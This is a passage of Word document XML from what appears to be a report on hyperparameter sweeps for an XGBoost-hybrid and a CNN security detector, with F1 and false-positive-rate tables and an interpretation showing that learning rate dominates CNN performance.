                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">The highest-F1 point in the sweep (0.7354 / FPR 0.0796, vs 0.7329 at depth 6). Full-data re-validation </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>confirmed it holds</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">: the 43-feature XGBoost-hybrid reaches </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F1 0.8761 on Dataset 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> at depth 12, so 12 is the production setting — the earlier "adopt only after confirming on full data" caveat is now resolved.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>scale_pos_weight</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Best F1 in the sweep (0.7333) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>and</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> lowest FPR (0.0490). Because F1 is invariant to this knob, minimize false alarms — the default 3.0 buys ~3× the FPR for nothing. Raise toward 2.0 only if downstream misses (recall) prove costlier than triage load.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The through-line: for XGBoost, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>stop trying to tune F1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (it is saturated) and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>tune `scale_pos_weight` to hit the FPR your SOC can absorb.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>CNN — `learning_rate` dominates everything else</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Defaults:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>embed_dim=32</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>num_filters=128</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>dropout=0.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>lr=0.001</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>epochs=8</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>`learning_rate`</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0.0001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7127</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.1194</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.7942</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0665</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0010</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8298</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0547</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0030</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8512</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0533</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>`dropout`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0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8362</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0490</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8298</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0547</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8115</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0638</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>`num_filters`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64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8165</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0630</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>128</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8298</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0547</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8379</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0695</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>`embed_dim`</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value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>F1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FPR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8046</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0787</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8298</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0547</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.8281</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.0796</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Interpretation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>`learning_rate` is the dominant driver of CNN quality — by a wide margin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It moves F1 from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.7127</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1e-4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.8512</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>3e-3</w:t>
      </w:r>
      <w:r>
        <w:t>, a swing of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.1385</w:t>
      </w:r>
      <w:r>
        <w:t>. Every other CNN hyperparameter produces an F1 swing of roughly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.02–0.025</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (dropout 0.0247, num_filters 0.0214, embed_dim 0.0252) — an order</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">of magnitude smaller. The mechanism is optimisation, not capacity: at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1e-4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">network is simply </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>undertrained</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> within the fixed 8-epoch budget, so it sits in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>a high-loss regime that also produces its worst FPR (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.1194</w:t>
      </w:r>
      <w:r>
        <w:t>). Increasing the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>step size lets the same architecture actually converge, and F1 and FPR improve</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>together</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (FPR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.1194 → 0.0533</w:t>
      </w:r>
      <w:r>
        <w:t>, roughly halved) — the hallmark of a model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>that was underfit rather than mis-regularised. Because the best point sits at the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>top of the swept range</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, there may be marginal headroom just above </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>3e-3</w:t>
      </w:r>
      <w:r>
